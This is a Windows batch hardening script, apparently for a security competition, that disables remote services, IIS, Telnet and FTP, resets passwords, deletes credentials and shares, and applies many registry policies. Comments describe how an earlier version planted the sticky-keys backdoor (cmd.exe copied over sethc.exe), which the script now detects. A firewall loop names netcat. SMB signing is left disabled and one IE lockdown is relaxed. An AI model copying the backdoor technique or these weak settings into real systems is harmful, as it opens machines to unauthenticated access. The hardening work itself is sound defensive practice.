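@echo off
color 0f
cls
:admnchk
REM Everything below writes HKLM keys, stops services and edits system files,
REM so the script needs an elevated prompt. "net sessions" is denied when not
REM elevated, which makes its exit status a cheap admin check. Its output is
REM noise here, so it is discarded.
echo Immediately checking for Administrative access
net sessions >NUL 2>&1
if %errorlevel%==0 (
    echo Yay you have Admin u no how2windows GG
    goto :adminhop
) else (
    echo Lol u r bad
    echo N0 Adm1n n00b!
    pause
    REM Plain "exit" reported success (0) to any caller and killed the parent
    REM console; "exit /b 1" returns a failure status to the calling shell.
    exit /b 1
)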
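:adminhop
REM Turns on UAC (takes effect at the next logon/reboot)
reg ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 1 /f
REM Turns off RDP. Failsafe: if the registry write fails, disable the built-in
REM "Remote Desktop" firewall rule group instead. (The original used the
REM pre-Vista "netsh firewall set service" syntax, which advfirewall rejects,
REM and tested the errorlevel of the wrong reg command.)
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 1 /f || netsh advfirewall firewall set rule group="remote desktop" new enable=no
REM UserAuthentication=1 requires Network Level Authentication if RDP is ever
REM re-enabled; the original wrote 0, which allows connections without NLA.
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d 1 /f
REM Windows automatic updates. AUOptions 3 = download and notify before install;
REM 4 = download and install on schedule.
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate\Auto Update" /v AUOptions /t REG_DWORD /d 3 /f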
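echo Cleaning out the DNS cache...
ipconfig /flushdns
echo Writing over the hosts file...
REM Use %SystemRoot% instead of a hard-coded C:\WINDOWS. In a batch file
REM "echo > file" writes the literal text "ECHO is off." into the file;
REM "type NUL > file" truncates it to empty. A failed redirection (e.g. access
REM denied) makes the command fail, so || reports it.
attrib -r -s "%SystemRoot%\System32\drivers\etc\hosts"
type NUL > "%SystemRoot%\System32\drivers\etc\hosts" || echo There was an error in writing to the hosts file (not running this as Admin probably)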
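REM Services
echo Showing you the services...
net start
echo Now writing services to a file and searching for vulnerable services...
net start > servicesstarted.txt
REM A lone trailing % is dropped inside a batch file; %% prints a literal %.
echo This is only common services, not nessecarily going to catch 100%%
REM looks to see if remote registry is on. findstr treats a second bare word
REM as a file name ("findstr Remote Registry" searched a file called
REM "Registry"), so the phrase must be passed literally with /C:"...".
net start | findstr /C:"Remote Registry" >NUL
if %errorlevel%==0 (
    echo Remote Registry is running!
    echo Attempting to stop...
    net stop RemoteRegistry
    REM sc requires the space after "start=". Inside a parenthesised block
    REM %errorlevel% is expanded once before the block runs, so the original
    REM check never saw this command's result; || tests it directly.
    sc config RemoteRegistry start= disabled || echo Stop failed... sorry...
) else (
    echo Remote Registry is already indicating stopped.
)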
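REM Remove all saved credentials from Credential Manager. "cmdkey /list" prints
REM one "Target: <name>" line per entry; the second token of that line is the
REM target handed to /delete. usebackq + quotes keep the loop working when
REM %TEMP% contains spaces.
cmdkey.exe /list > "%TEMP%\List.txt"
findstr.exe Target "%TEMP%\List.txt" > "%TEMP%\tokensonly.txt"
FOR /F "usebackq tokens=1,2 delims= " %%G IN ("%TEMP%\tokensonly.txt") DO cmdkey.exe /delete:%%H
REM Clean up only the two scratch files. The original "del %TEMP%\*.* /s /f /q"
REM wiped the whole temp tree, including files other running programs had open.
del /f /q "%TEMP%\List.txt" "%TEMP%\tokensonly.txt"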
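REM looks to see if remote access is on: stop and disable the remote-access
REM style services. The original filled SRVC_LIST but then looped over an
REM undefined %HITHERE%, so nothing was ever stopped, and the second loop had
REM no "do" at all.
set SRVC_LIST=RemoteAccess Telephony tlntsvr p2pimsvc simptcp fax msftpsvc
for %%i in (%SRVC_LIST%) do (
    net stop %%i
    sc config %%i start= disabled
)
REM Rogue User Portion deleted.... disabling code because it's lame as hell....
REM net users
REM echo Would you like to delete a username?
REM set /p ynuser=Y or N?
REM if %ynuser%==Y (
REM set /p deluser=Enter a user to delete:
REM if %deluser%=="CYBERNEXS" echo DO NOT DELETE CYBERNEXS. IT WILL DISCONNNECT TO SAIC.
REM if %deluser%=="CYBERNEXS" goto :deletion
REM net user %deluser% /delete
REM if %errorlevel%==0 echo Deletion succcessful.
REM goto :deletion
REM ) else (
REM echo K. Moving on.
REM )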
REM Guest account: report whether it is active, then disable it either way.
net user Guest | findstr Active | findstr Yes
if %errorlevel%==0 (
    echo Guest account is active, deactivating
) else if %errorlevel%==1 (
    echo Guest account is not active, checking default admin account
)
REM Disabling an already-disabled account is harmless, so no branch is needed.
net user Guest /active:NO
REM Rename the Guest account so the well-known name no longer exists.
wmic useraccount where name='Guest' rename baconsweggur
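REM Make sure you are not on the administrator account before you deactivate
REM the administrator account.
echo Making sure you are not on the default admin account...
net user | findstr Administrator
if %errorlevel%==0 (
    echo "Administrator" account exists
    echo Looking to see if you are on it
    REM Windows account names are case-insensitive and %username% carries
    REM whatever case was typed at logon, so compare with /I; a case-sensitive
    REM match could disable the account you are currently logged in as.
    if /I "%username%"=="Administrator" (
        echo Awkward, you ARE the Administrator account
        goto :skipcode
    )
    net user Administrator /active:NO
)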
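:skipcode
REM The password is typed in the clear and echoed to the console; it is also
REM applied to every account, so each user should change it afterwards.
set /p newpwd=Enter a new password for your accounts:
net users > userlist.txt
REM "net users" prints a banner, a dashed rule, up to three account names per
REM line, then a trailer. The original loop took only token 1 of each line
REM (columns 2 and 3 were never reset, and banner words were fed to "net
REM user") and tested %errorlevel% inside a parenthesised block, where it is
REM expanded once before the loop runs, so no password was ever changed.
REM The NEXS exclusion presumably protects the competition's scoring account
REM (CYBERNEXS is named in the commented-out section above) - verify.
for /F "tokens=1-3" %%h in ('findstr /V /B /C:"User accounts" /C:"---" /C:"The command" userlist.txt') do (
    for %%u in (%%h %%i %%j) do (
        echo %%u | findstr /I NEXS >NUL || net user "%%u" "%newpwd%" >> pwchanges.txt
    )
)
REM The list of account names is not needed once the loop is done.
del /q userlist.txt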
REM Now on to the firewall. Disables common inbound rules by name; the rule
REM names are quoted because they contain spaces and parentheses.
for %%r in (
    "Remote Assistance (DCOM-In)"
    "Remote Assistance (PNRP-In)"
    "Remote Assistance (RA Server TCP-In)"
    "Remote Assistance (SSDP TCP-In)"
    "Remote Assistance (SSDP UDP-In)"
    "Remote Assistance (TCP-In)"
    "Telnet Server"
    "netcat"
) do (
    netsh advfirewall firewall set rule name=%%r new enable=no >NUL
)
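REM Disabling Windows Features (IIS, FTP, TFTP, Telnet). Features that are
REM already off simply fail quietly. /NoRestart is required: with output sent
REM to NUL, DISM's "restart now? (Y/N)" prompt was invisible and the script
REM would sit waiting on it.
for %%f in (
    IIS-WebServerRole
    IIS-WebServer
    IIS-CommonHttpFeatures
    IIS-HttpErrors
    IIS-HttpRedirect
    IIS-ApplicationDevelopment
    IIS-NetFxExtensibility
    IIS-NetFxExtensibility45
    IIS-HealthAndDiagnostics
    IIS-HttpLogging
    IIS-LoggingLibraries
    IIS-RequestMonitor
    IIS-HttpTracing
    IIS-Security
    IIS-URLAuthorization
    IIS-RequestFiltering
    IIS-IPSecurity
    IIS-Performance
    IIS-HttpCompressionDynamic
    IIS-WebServerManagementTools
    IIS-ManagementScriptingTools
    IIS-IIS6ManagementCompatibility
    IIS-Metabase
    IIS-HostableWebCore
    IIS-StaticContent
    IIS-DefaultDocument
    IIS-DirectoryBrowsing
    IIS-WebDAV
    IIS-WebSockets
    IIS-ApplicationInit
    IIS-ASPNET
    IIS-ASPNET45
    IIS-ASP
    IIS-CGI
    IIS-ISAPIExtensions
    IIS-ISAPIFilter
    IIS-ServerSideIncludes
    IIS-CustomLogging
    IIS-BasicAuthentication
    IIS-HttpCompressionStatic
    IIS-ManagementConsole
    IIS-ManagementService
    IIS-WMICompatibility
    IIS-LegacyScripts
    IIS-LegacySnapIn
    IIS-FTPServer
    IIS-FTPSvc
    IIS-FTPExtensibility
    TFTP
    TelnetClient
    TelnetServer
) do (
    dism /online /disable-feature /featurename:%%f /NoRestart >NUL
)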
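REM now on to the power settings: require a password on wakeup for the three
REM built-in schemes, on both battery (DC) and mains (AC). The original set DC
REM twice for SCHEME_MIN and SCHEME_MAX and never set AC for them.
REM NOTE(review): unclear whether the active scheme needs a "powercfg -SETACTIVE"
REM afterwards to pick the new index up - confirm on a test machine.
for %%s in (SCHEME_BALANCED SCHEME_MIN SCHEME_MAX) do (
    powercfg -SETDCVALUEINDEX %%s SUB_NONE CONSOLELOCK 1
    powercfg -SETACVALUEINDEX %%s SUB_NONE CONSOLELOCK 1
)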
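REM Remove user-created network shares (names with spaces are only matched by
REM their first word, as before). "net share" prints a header, a dashed rule,
REM one share per line and a trailer; the original fed the first token of
REM every line - including "Share", "The" and the administrative shares - to
REM "net share /delete" with the arguments in the wrong order. Shares ending in
REM $ are skipped: deleting IPC$ breaks named-pipe services and ADMIN$/C$ are
REM recreated at boot (turn them off via LanmanServer\Parameters\AutoShareWks).
net share > sharelist.txt
for /F "tokens=1" %%h in ('findstr /V /B /C:"Share name" /C:"---" /C:"The command" sharelist.txt') do (
    echo %%h | findstr /L /E /C:"$" >NUL || net share "%%h" /delete >> deletedsharelist.txt
)
pause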
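REM Common Policies
REM Restrict CD ROM drive to the locally logged-on user. Winlogon documents
REM AllocateCDRoms / AllocateFloppies as REG_SZ ("1"), not REG_DWORD.
reg ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v AllocateCDRoms /t REG_SZ /d 1 /f
REM Automatic Admin logon off. AutoAdminLogon is also documented as REG_SZ, and
REM the autologon password is stored in clear text in DefaultPassword, so
REM that value is removed as well (ignore "not found").
reg ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v AutoAdminLogon /t REG_SZ /d 0 /f
reg DELETE "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultPassword /f >NUL 2>&1
REM Logon message text (the original line lacked /f and would prompt if the value existed)
reg ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v LegalNoticeText /t REG_SZ /d "Lol noobz pl0x don't hax, thx bae" /f
REM Logon message title bar
reg ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v LegalNoticeCaption /t REG_SZ /d "Dnt hax me" /f
REM Wipe page file at shutdown
reg ADD "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management" /v ClearPageFileAtShutdown /t REG_DWORD /d 1 /f
REM Restrict floppy access to the locally logged-on user (REG_SZ, see above)
reg ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v AllocateFloppies /t REG_SZ /d 1 /f
REM Prevent print driver installs
reg ADD "HKLM\SYSTEM\CurrentControlSet\Control\Print\Providers\LanMan Print Services\Servers" /v AddPrinterDrivers /t REG_DWORD /d 1 /f
REM Limit local account use of blank passwords to console
reg ADD "HKLM\SYSTEM\CurrentControlSet\Control\Lsa" /v LimitBlankPasswordUse /t REG_DWORD /d 1 /f
REM Auditing access of Global System Objects
reg ADD "HKLM\SYSTEM\CurrentControlSet\Control\Lsa" /v auditbaseobjects /t REG_DWORD /d 1 /f
REM Auditing Backup and Restore
reg ADD "HKLM\SYSTEM\CurrentControlSet\Control\Lsa" /v fullprivilegeauditing /t REG_DWORD /d 1 /f
REM Do not display last user on logon
reg ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v dontdisplaylastusername /t REG_DWORD /d 1 /f
REM UAC setting (Prompt on Secure Desktop)
reg ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v PromptOnSecureDesktop /t REG_DWORD /d 1 /f
REM Enable Installer Detection
reg ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableInstallerDetection /t REG_DWORD /d 1 /f
REM Undock without logon: not allowed
reg ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v undockwithoutlogon /t REG_DWORD /d 0 /f
REM Maximum Machine Password Age (days)
reg ADD HKLM\SYSTEM\CurrentControlSet\services\Netlogon\Parameters /v MaximumPasswordAge /t REG_DWORD /d 15 /f
REM "Disable machine account password changes" must itself be Disabled (0).
REM The original wrote 1, which stops the machine password ever rotating and
REM makes the MaximumPasswordAge above meaningless.
reg ADD HKLM\SYSTEM\CurrentControlSet\services\Netlogon\Parameters /v DisablePasswordChange /t REG_DWORD /d 0 /f
REM Require Strong Session Key
reg ADD HKLM\SYSTEM\CurrentControlSet\services\Netlogon\Parameters /v RequireStrongKey /t REG_DWORD /d 1 /f
REM Require Sign/Seal
reg ADD HKLM\SYSTEM\CurrentControlSet\services\Netlogon\Parameters /v RequireSignOrSeal /t REG_DWORD /d 1 /f
REM Sign Channel
reg ADD HKLM\SYSTEM\CurrentControlSet\services\Netlogon\Parameters /v SignSecureChannel /t REG_DWORD /d 1 /f
REM Seal Channel
reg ADD HKLM\SYSTEM\CurrentControlSet\services\Netlogon\Parameters /v SealSecureChannel /t REG_DWORD /d 1 /f
REM Keep CTRL+ALT+DEL required at logon (DisableCAD=0)
reg ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v DisableCAD /t REG_DWORD /d 0 /f
REM Restrict Anonymous Enumeration #1
reg ADD HKLM\SYSTEM\CurrentControlSet\Control\Lsa /v restrictanonymous /t REG_DWORD /d 1 /f
REM Restrict Anonymous Enumeration #2
reg ADD HKLM\SYSTEM\CurrentControlSet\Control\Lsa /v restrictanonymoussam /t REG_DWORD /d 1 /f
REM Idle Time Limit - 45 mins
reg ADD HKLM\SYSTEM\CurrentControlSet\services\LanmanServer\Parameters /v autodisconnect /t REG_DWORD /d 45 /f
REM SMB server signing. The two comments were swapped in the original:
REM enablesecuritysignature = "sign if client agrees", requiresecuritysignature
REM = "always sign". Both left at 0 pursuant to the author's checklist; absent
REM that requirement both should normally be 1 (SMB relay protection).
REM Enable Security Signature - Disabled pursuant to checklist
reg ADD HKLM\SYSTEM\CurrentControlSet\services\LanmanServer\Parameters /v enablesecuritysignature /t REG_DWORD /d 0 /f
REM Require Security Signature - Disabled pursuant to checklist
reg ADD HKLM\SYSTEM\CurrentControlSet\services\LanmanServer\Parameters /v requiresecuritysignature /t REG_DWORD /d 0 /f
REM Disable Domain Credential Storage
reg ADD HKLM\SYSTEM\CurrentControlSet\Control\Lsa /v disabledomaincreds /t REG_DWORD /d 1 /f
REM Don't Give Anons Everyone Permissions
reg ADD HKLM\SYSTEM\CurrentControlSet\Control\Lsa /v everyoneincludesanonymous /t REG_DWORD /d 0 /f
REM SMB Passwords unencrypted to third party? How bout nah
reg ADD HKLM\SYSTEM\CurrentControlSet\services\LanmanWorkstation\Parameters /v EnablePlainTextPassword /t REG_DWORD /d 0 /f
REM Null Session Pipes Cleared
reg ADD HKLM\SYSTEM\CurrentControlSet\services\LanmanServer\Parameters /v NullSessionPipes /t REG_MULTI_SZ /d "" /f
REM Remotely accessible registry paths cleared
reg ADD HKLM\SYSTEM\CurrentControlSet\Control\SecurePipeServers\winreg\AllowedExactPaths /v Machine /t REG_MULTI_SZ /d "" /f
REM Remotely accessible registry paths and sub-paths cleared
reg ADD HKLM\SYSTEM\CurrentControlSet\Control\SecurePipeServers\winreg\AllowedPaths /v Machine /t REG_MULTI_SZ /d "" /f
REM Restrict anonymous access to named pipes and shares
reg ADD HKLM\SYSTEM\CurrentControlSet\services\LanmanServer\Parameters /v NullSessionShares /t REG_MULTI_SZ /d "" /f
REM Allow Local System to use the computer identity for NTLM. The comment says
REM "allow" but the original wrote 0 (disallow); 1 is the hardened setting.
reg ADD HKLM\SYSTEM\CurrentControlSet\Control\Lsa /v UseMachineId /t REG_DWORD /d 1 /f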
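REM Internet Explorer. NOTE: every HKCU value below only affects the account
REM running this script, not other users on the machine.
REM Smart Screen for IE8
reg ADD "HKCU\Software\Microsoft\Internet Explorer\PhishingFilter" /v EnabledV8 /t REG_DWORD /d 1 /f
REM Smart Screen for IE9+
reg ADD "HKCU\Software\Microsoft\Internet Explorer\PhishingFilter" /v EnabledV9 /t REG_DWORD /d 1 /f
REM Windows Explorer Settings: show hidden and protected operating-system files
reg ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v Hidden /t REG_DWORD /d 1 /f
reg ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v ShowSuperHidden /t REG_DWORD /d 1 /f
REM Disable Dump file creation
reg ADD HKLM\SYSTEM\CurrentControlSet\Control\CrashControl /v CrashDumpEnabled /t REG_DWORD /d 0 /f
REM Disable Autorun. The cdrom service key lives under HKLM, not HKCU (the
REM original created an unused HKCU\SYSTEM key), and AutoRun=1 *enables* it -
REM 0 disables. NoDriveTypeAutoRun=255 additionally turns AutoRun off for every
REM drive type through the Explorer policy.
reg ADD HKLM\SYSTEM\CurrentControlSet\Services\cdrom /v AutoRun /t REG_DWORD /d 0 /f
reg ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDriveTypeAutoRun /t REG_DWORD /d 255 /f
REM Disable Internet Explorer Password Caching
reg ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v DisablePasswordCaching /t REG_DWORD /d 1 /f
REM Internet Explorer Settings
REM Enable Do Not Track
reg ADD "HKCU\Software\Microsoft\Internet Explorer\Main" /v DoNotTrack /t REG_DWORD /d 1 /f
REM RunInvalidSignatures=1 lets downloads with invalid signatures run; the
REM hardened value is 0.
reg ADD "HKCU\Software\Microsoft\Internet Explorer\Download" /v RunInvalidSignatures /t REG_DWORD /d 0 /f
REM The original ended this line with a stray "/t" instead of "/f" (syntax
REM error). NOTE(review): confirm 1 is the intended value for
REM LOCALMACHINE_CD_UNLOCK - it relaxes the Local Machine zone lockdown for CDs.
reg ADD "HKCU\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_LOCALMACHINE_LOCKDOWN\Settings" /v LOCALMACHINE_CD_UNLOCK /t REG_DWORD /d 1 /f
REM Warn on bad server certificates (the original passed "/d /1")
reg ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v WarnonBadCertRecving /t REG_DWORD /d 1 /f
reg ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v WarnOnPostRedirect /t REG_DWORD /d 1 /f
reg ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v WarnonZoneCrossing /t REG_DWORD /d 1 /f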
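REM account password policy set. FORCELOGOFF is minutes after valid logon
REM hours expire; ages are in days. "net accounts" does not set complexity -
REM that needs secedit / the local security policy.
echo New requirements are being set for your passwords
net accounts /FORCELOGOFF:30 /MINPWLEN:8 /MAXPWAGE:30 /MINPWAGE:10 /UNIQUEPW:3
REM The original announced the new policy even when net accounts had failed.
if errorlevel 1 (
    echo Setting the password policy FAILED - the values below were NOT applied
)
echo New password policy:
echo Force log off after 30 minutes
echo Minimum password length of 8 characters
echo Maximum password age of 30
echo Minimum password age of 10
echo Unique password threshold set to 3 (default is 5)
pause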
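REM Review scheduled tasks rather than wiping them. "schtasks /Delete /TN *"
REM removed every task on the box - Windows' own maintenance tasks (Defender
REM scans, update scheduling, disk cleanup) along with anything unwanted - and
REM without /F it prompted for each one. Dump them for a human to read and
REM delete specific ones by name with "schtasks /Delete /TN <name> /F".
schtasks /Query /FO LIST /V > scheduledtasks.txt
echo Scheduled tasks written to scheduledtasks.txt - review them for anything unexpected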
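REM Sticky Keys integrity check. The original section took ownership of
REM cmd.exe and sethc.exe, granted the current user full control and copied
REM cmd.exe over sethc.exe. That is not hardening: it plants the well-known
REM sticky-keys backdoor, which gives anyone at the logon screen a SYSTEM
REM command prompt without authenticating. A hardening script must do the
REM opposite - confirm sethc.exe is the genuine Windows binary and that no
REM debugger has been hooked onto it.
echo Checking that Sticky Keys (sethc.exe) has not been tampered with...
sfc /scanfile=%SystemRoot%\System32\sethc.exe
REM An Image File Execution Options "Debugger" entry for sethc.exe is the
REM other common way this backdoor is planted; reg query returns 0 only when
REM the value exists.
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger >NUL 2>&1 && echo WARNING: a Debugger is registered for sethc.exe - inspect and remove it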
REM Auditing Policy: enable success and failure auditing for every category
REM (both flags are accepted in a single auditpol call).
auditpol /set /category:* /success:enable /failure:enable
REM system verification. /verifyonly reports protected files that differ from
REM the known-good copies but repairs nothing; run "sfc /scannow" to fix them.
sfc /verifyonly
pause